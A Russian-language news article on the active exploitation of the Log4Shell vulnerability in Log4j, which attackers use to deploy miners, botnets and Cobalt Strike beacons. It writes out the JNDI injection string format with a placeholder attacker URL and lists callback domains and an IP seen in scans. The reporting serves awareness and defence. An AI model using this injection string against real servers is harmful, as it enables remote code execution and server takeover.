Злоумышленники и ИБ-исследователи уже сканируют сеть в поисках продуктов, уязвимых перед опасным багом в библиотеке Log4j, которому дали имя Log4Shell. Уязвимость уже используется для развертывания майнеров, маяков Cobalt Strike и так далее.
Log4Shell
О проблеме в популярной библиотеке журналирования Log4j, входящей в состав Apache Logging Project, стало известно на прошлой неделе. 0-day уязвимость получила идентификатор CVE-2021-44228 и набрала 10 баллов из 10 возможных по шкале оценки уязвимостей CVSS, так как допускает удаленное выполнение произвольного кода (RCE). Проблема усугубляется тем, что в сети уже появились PoC-эксплоиты, а использовать уязвимость можно удаленно, причем для этого не нужны особые технические навыки.
Уязвимость вынуждает приложения и серверы на основе Java, где используется библиотека Log4j, журналировать определенную строку в своих внутренних системах. Когда приложение или сервер обрабатывают такие логи, строка может заставить уязвимую систему загрузить и запустить вредоносный скрипт из домена, контролируемого злоумышленником. Итогом станет полный захват уязвимого приложения или сервера.
Исходно проблема была обнаружена во время поиска багов на серверах Minecraft, но библиотека Log4j присутствует практически в любых корпоративных приложениях и Java-серверах. К примеру, ее можно найти почти во всех корпоративных продуктах, выпущенных Apache Software Foundation, включая Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Flink, Apache Kafka, Apache Dubbo и так далее. Также Log4j активно применяют в различных опенсорсных проектах, включая Redis, ElasticSearch, Elastic Logstash, Ghidra и других.
Таким образом, компании, использующие любой из этих продуктов, тоже косвенно уязвимы перед атаками на Log4Shell, но могут даже знать об этом. Еще на прошлой неделе ИБ-специалисты сообщали, что перед Log4Shell могут быть уязвимы решения таких гигантов, как Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase и, вероятно, тысячи других компаний. Хуже того, злоумышленники немедленно начали сканировать сеть в поисках целей для атак.
Напомню, что патч уже выпущен в рамках релиза 2.15.0.
Атаки
Как теперь сообщает издание Bleeping Computer, атаки на Log4Shell уже начались. Издание рассказывает, что для использования бага злоумышленник может попросту изменить user agent своего браузера и посетить определенный сайт или выполнить поиск строки на сайте, используя формат ${jndi:ldap://[attacker_URL]
}.
В итоге это приведет к добавлению строки в логи доступа веб-сервера, и когда приложение Log4j будет анализировать эти логи и обнаружит строку, ошибка заставит сервер выполнить callbackили запрос на URL-адрес, указанный в строке JNDI. После этого злоумышленники смогут использовать этот URL для передачи команд уязвимому устройству (в кодировке Base64 или в виде классов Java).
Хуже того, для определения уязвимости удаленного сервера перед Log4Shell может использоваться просто принудительное подключение.
Сообщается, что злоумышленники уже используют Log4Shell для выполнения шелл-скриптов, которые загружают и устанавливают различные майнеры. В частности, хакеры, стоящие за малварью Kinsing и одноименным ботнетом, активно злоупотребляют багом в Log4j и используют Base64 пейлоады, которые заставляют уязвимый сервер загружать и выполнять шелл-скрипты. Скрипт удаляет конкурирующую малварь с уязвимого устройства, а затем загружает и устанавливает вредоноса Kinsing, который начнет добычу криптовалюты.
В свою очередь, китайские специалисты из Netlab 360 предупреждают, что уязвимость используется для установки малвари Mirai и Muhstik на уязвимые устройства. Эти IoT-угрозы делают уязвимые девайсы частью ботнетов, используют их для добычи криптовалюты и проведения масштабных DDoS-атак.
«Мы получили первые ответы от наших honeypot’ов Anglerfish и Apacket, которые зафиксировали две волны атак с использованием уязвимости Log4j для формирования ботнетов. Быстрый анализ выборки показал, что они использовались для формирования ботнетов Muhstik и Mirai то есть в обоих случаях были нацелены на устройства Linux», — говорят эксперты.
По информации аналитиков Microsoft, уязвимость в Log4j также используется для сбрасывания маяков Cobalt Strike. Изначально Cobalt Strike — это легитимный коммерческий инструмент, созданный для пентестеров и red team и ориентированный на эксплуатацию и постэксплуатацию. К сожалению, он давно любим хакерами, начиная от правительственных APT-группировок и заканчивая операторами шифровальщиков.
Хотя он недоступен для рядовых пользователей и полная версия оценивается примерно в 3500 долларов за установку, злоумышленники все равно находят способы его использовать (к примеру, полагаются на старые, пиратские, взломанные и незарегистрированные версии).
Пока нет доказательств, гарантирующих, что вымогатели взяли эксплоит для Log4j на вооружение, но, по мнению экспертов, развертывание маяков Cobalt Strike, ясно говорит о том, что такие атаки неизбежны.
Также, помимо эксплуатации Log4Shell для установки различной малвари, злоумышленники используют проблему для сканирования уязвимых серверов и получения от них информации. Так, эксплоит, показанный ниже, может заставить уязвимые серверы обращаться к URL-адресам или выполнять DNS-запросы для callback-доменов. Это позволяет ИБ-специалистам и хакерам определять, является ли сервер уязвимым, и использовать его для будущих атак, исследований или попытаться получить bug bounty от его владельцев.
Журналисты опасаются, что некоторые исследователи могут зайти слишком далеко, используя эксплоит для кражи переменных окружения, которые содержат данные сервера, включая имя хоста, имя пользователя, под которым работает служба Log4j, данные об ОС и номер версии ОС.
Наиболее распространенные домены и IP-адреса, используемые для таких сканирований, это:
• interactsh.com
• burpcollaborator.net
• dnslog.cn
• bin${upper:a}ryedge.io
• leakix.net
• bingsearchlib.com
• 205.185.115.217:47324
• bingsearchlib.com:39356
• canarytokens.com
Особый интерес здесь представляет домен bingsearchlib.com, который используется для callback-эксплоитов. Дело в том, что неназванный ИБ-исследователь сообщил Bleeping Computer, что, хотя домен использовался в качестве callback’а для эксплоитов, bingsearchlib.com не был зарегистрирован. В итоге эксперт зарегистрировал домен, чтобы предотвратить злоупотребления, но не регистрирует запросы.
Компания GreyNoise сообщает, что IP-адреса, использующие callback bingsearchlib.com, также часто используют callback с 205.185.115.217:47324.
Сами исследователи Bleeping Computer обнаружили многочисленные запросы от домена psc4fuel.com, пытающиеся эксплуатировать сайт издания. Судя по всему, домен выдает себя за легитимный psc4fuel.com, принадлежащий нефтяной компании. Этот домен используется для отправки классов Java, однако получить образец классов не удалось, то есть пока неясно, стоит за атаками исследователь или хакер.